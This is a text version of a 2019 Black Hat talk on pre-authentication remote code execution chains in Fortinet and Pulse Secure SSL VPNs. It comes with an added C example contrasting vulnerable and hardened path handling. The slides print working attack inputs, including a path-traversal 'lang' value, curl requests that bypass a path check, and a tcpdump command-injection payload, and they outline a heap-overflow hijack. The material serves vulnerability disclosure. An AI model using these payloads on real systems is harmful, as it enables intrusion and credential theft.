VPN Rce's PDF
Like NSA
Pre-auth RCE on Leading SSL VPNs
Black Hat USA 2019
Orange Tsai
• Principal security researcher at DEVCORE
• Captain of HITCON CTF team
• 0day researcher, focusing on Web/Application security
orange_8361
Meh Chang
• Security researcher at DEVCORE
• HITCON & 217 CTF team
• Focus on binary exploitation
mehqq_
Highlights today
• Pre-auth root RCE exploit chain on Fortinet SSL VPN
• Hard-core binary exploitation
• Magic backdoor
[Chart residue: bar values 50, 26, 17, 13, 6; source https://nvd.nist.gov]
We focus on…
• Pulse Secure SSL VPN
• More than 50,000 servers operating on the Internet
• Trusted by large corporations, service providers and government entities
Stage 1: vmlinuz kernel (zImage / bzImage), loaded by LILO/GRUB
• Level - Hard
• Reverse engineering for the win!
Stage 2: /sbin/init
• Level - Easy
• Memory forensics for the win!
The booting process: BIOS → LILO → Kernel → /sbin/init → ?????????????????
Find the vital point: BIOS → LILO → Kernel → /sbin/init
Memory Forensics: /home/bin/dsconfig.pl
In-memory patch: BIOS → LILO → Kernel → /sbin/init → Memory Patch → ///////////////bin/sh
Once we press the Enter…: BIOS → LILO → Kernel → /sbin/init → ///////////////bin/sh
Digging at a correct place
Attack vectors
• WebVPN
• Native script language extensions
• Multi-layered architecture problems
WebVPN
Native script language extensions (Perl wrapper calling into a C extension):
    my ($var) = @_;
    EXTENSION::C_function($var);
Multi-layered architecture problems
• Inconsistency between each architecture layer
• Failed patterns
• Reverse proxy + Java web = Fail
• Breaking Parser Logic by Orange Tsai from Black Hat USA 2018
https://sslvpn/public/images/x/front_x/../../../../some.php
Case studies
Pre-auth remote code execution on Fortigate SSL VPN
Pre-auth remote code execution on Pulse Secure SSL VPN
Disclaimer
All the CVEs mentioned below have been reported and patched by Fortinet, Pulse Secure and Twitter
Fortigate SSL VPN
Path traversal through the lang parameter:
lang=/../../../..//////////////////////////////bin/sh
snprintf(s, 0x40, "/migadmin/lang/%s.json", lang);
/migadmin/lang//../../../..//////////////////////////////bin/sh.json
The destination buffer is only 0x40 bytes, so snprintf truncates the formatted path and the ".json" suffix never reaches the buffer.
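How the truncation works, as an added standalone C example (this is not Fortinet's code): it rebuilds the lang value from the slide, runs it through the snprintf call shown above, and places a hardened path builder beside the vulnerable one. The function names, the character whitelist and the 16-character limit are assumptions made here for illustration.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

#define LANG_PATH_SIZE 0x40   /* buffer size taken from the snprintf call on the slide */

/* Vulnerable pattern as shown on the slide: snprintf silently truncates, and
 * nothing validates lang, so a 48-byte traversal string pushes the ".json"
 * suffix past the end of the 0x40-byte buffer and it is dropped. */
static void build_lang_path_vulnerable(char out[LANG_PATH_SIZE], const char *lang) {
    snprintf(out, LANG_PATH_SIZE, "/migadmin/lang/%s.json", lang);
}

/* Hardened variant (added here, not Fortinet's fix): accept only a short
 * language name made of [A-Za-z0-9_-] and treat a truncated snprintf as an
 * error instead of using the partial path. Returns 0 on success, -1 on reject. */
static int build_lang_path_hardened(char out[LANG_PATH_SIZE], const char *lang) {
    size_t n = strlen(lang);
    if (n == 0 || n > 16)
        return -1;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)lang[i];
        if (!isalnum(c) && c != '_' && c != '-')
            return -1;
    }
    int written = snprintf(out, LANG_PATH_SIZE, "/migadmin/lang/%s.json", lang);
    if (written < 0 || (size_t)written >= LANG_PATH_SIZE) {
        out[0] = '\0';
        return -1;            /* output would have been truncated */
    }
    return 0;
}

/* Rebuild the lang value from the slide: "/../../../.." + 30 '/' + "bin/sh"
 * (48 bytes; constructed here by counting the characters on the slide). */
static void slide_lang_value(char *buf, size_t size) {
    const char *prefix = "/../../../..";
    const char *suffix = "bin/sh";
    size_t pos = 0;
    memset(buf, 0, size);
    memcpy(buf + pos, prefix, strlen(prefix));
    pos += strlen(prefix);
    memset(buf + pos, '/', 30);
    pos += 30;
    memcpy(buf + pos, suffix, strlen(suffix) + 1);
}

/* 1 if the vulnerable builder yields a 63-char path ending in "bin/sh" with no ".json". */
int demo_vulnerable_drops_suffix(void) {
    char lang[64], out[LANG_PATH_SIZE];
    slide_lang_value(lang, sizeof lang);
    build_lang_path_vulnerable(out, lang);
    size_t len = strlen(out);
    return len == LANG_PATH_SIZE - 1
        && strstr(out, ".json") == NULL
        && strcmp(out + len - 6, "bin/sh") == 0;
}

/* 1 if the hardened builder rejects the slide's lang value. */
int demo_hardened_rejects_traversal(void) {
    char lang[64], out[LANG_PATH_SIZE];
    slide_lang_value(lang, sizeof lang);
    return build_lang_path_hardened(out, lang) == -1;
}

/* 1 if the hardened builder still produces the expected path for a plain name. */
int demo_hardened_accepts_plain_name(void) {
    char out[LANG_PATH_SIZE];
    return build_lang_path_hardened(out, "en") == 0
        && strcmp(out, "/migadmin/lang/en.json") == 0;
}

int main(void) {
    printf("vulnerable builder drops .json: %d\n", demo_vulnerable_drops_suffix());
    printf("hardened builder rejects traversal: %d\n", demo_hardened_rejects_traversal());
    printf("hardened builder accepts \"en\": %d\n", demo_hardened_accepts_plain_name());
    return 0;
}
```

snprintf returns the length the full string would have had, so comparing that return value against the buffer size is how truncation is detected; the whitelist on the input is the check that actually closes the traversal, and the truncation check is the safety net for any other caller of the same buffer.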
An SSL VPN mystery
Appears in many products …
Excessively detailed session file
• /dev/cmdb/sslvpn_websession
• Session token
• IP address
• User name
• Plaintext password
WebVPN – HTTP/HTTPS
https://sslvpn:4433/proxy/72ebc8b8/https/devco.re/
Heap overflow vulnerability
• HTTP proxy
• Perform URL rewriting
• JavaScript parsing
• memcpy into a 0x2000-byte heap buffer without a length check
[Diagram: Normal request]
[Diagram: Exploit between connections; Connection 1, Connection 2 and Connection 3 laid out in heap memory (LOW → HIGH)]
[Diagram: Original SSL structure; ssl_accept() with fields *handshake, version, method, …, _func]
[Diagram: Trigger JavaScript parsing; the JS buffer is allocated between SSL structures in heap memory (SSL, JS buffer, SSL, SSL)]
[Diagram: Overflow SSL structure; memcpy(buffer, js_url, js_url_len); overruns the JS buffer and overwrites the adjacent SSL structure (*handshake, version, method, _func) with "A"s]
[Diagram: Forge SSL structure; the overwritten structure now carries system() where ssl_accept() was, alongside *handshake, version, method, …, _func]
Enjoy your shell!
• A “magic” parameter
• Secret key for password reset
• Designed for updating outdated passwords
• but lacks authentication
Demo: Pop a root shell from the only exposed HTTPS port
https://youtu.be/Aw55HqZW4x0
Pulse Secure SSL VPN
• Probably YES!
• All unpatched versions are vulnerable except the End-of-Life 8.1 code
$ curl -I 'https://sslvpn/dana-na///css/ds.js'
HTTP/1.1 400 Invalid Path
$ curl -I 'https://sslvpn/dana-na///css/ds.js?/dana/html5acc/guacamole/'
HTTP/1.1 200 OK
What can we extract?
/dana-admin/diag/diag.cgi
# Command injection: $options comes from the request and is interpolated,
# unquoted, into the shell command line handed to system().
sub tcpdump_options_syntax_check {
    my $options = shift;
    return $options if system("$TCPDUMP_COMMAND -d $options >/dev/null 2>&1") == 0;
    return undef;
}
Command Injection
Pulse Secure hardenings
• DSSafe.pm
• A Perl-C extension hooks several Perl functions such as:
• system, open, popen, exec, backtick…
dssafe_example.pl
use DSSafe;
$ tcpdump -d -r '123'
tcpdump: 123: No such file or directory
RCE Exploit
/usr/sbin/tcpdump -d -r'$x="ls",system$x#' 2>/data/runtime/tmp/tt/setcookie.thtml.ttc >/dev/null 2>&1
(1) -r'$x="ls",system$x#'
(2) 2>/data/runtime/tmp/tt/setcookie.thtml.ttc : STDERR(2) > /data/runtime/tmp/tt/setcookie.thtml.ttc
Output captured in the template file:
boot bin home lib64 mnt opt proc sys usr var
data etc lib lost+found modules pkg sbin tmp
...
Response from Pulse Secure
• Pulse Secure is committed to providing customers with the best Secure Access Solutions for Hybrid IT- SSL VPN and takes security vulnerabilities very seriously
• Timeline:
• This issue was reported to Pulse Secure PSIRT Team on March 22, 2019
• Pulse Secure fixes all reported issues in a short span of time and published the security advisory SA44101 on April 24, 2019 with all software updates that address the vulnerabilities for unpatched versions
• Pulse Secure assigned the CVEs to all reported vulnerabilities and updated the advisory on April 25, 2019
• Pulse Secure sent out a reminder to all customers to apply the security patches on June 26, 2019
• Pulse Secure would like to thank DEVCORE Team for reporting this vulnerability to Pulse Secure and working toward a coordinated disclosure
Hacking Twitter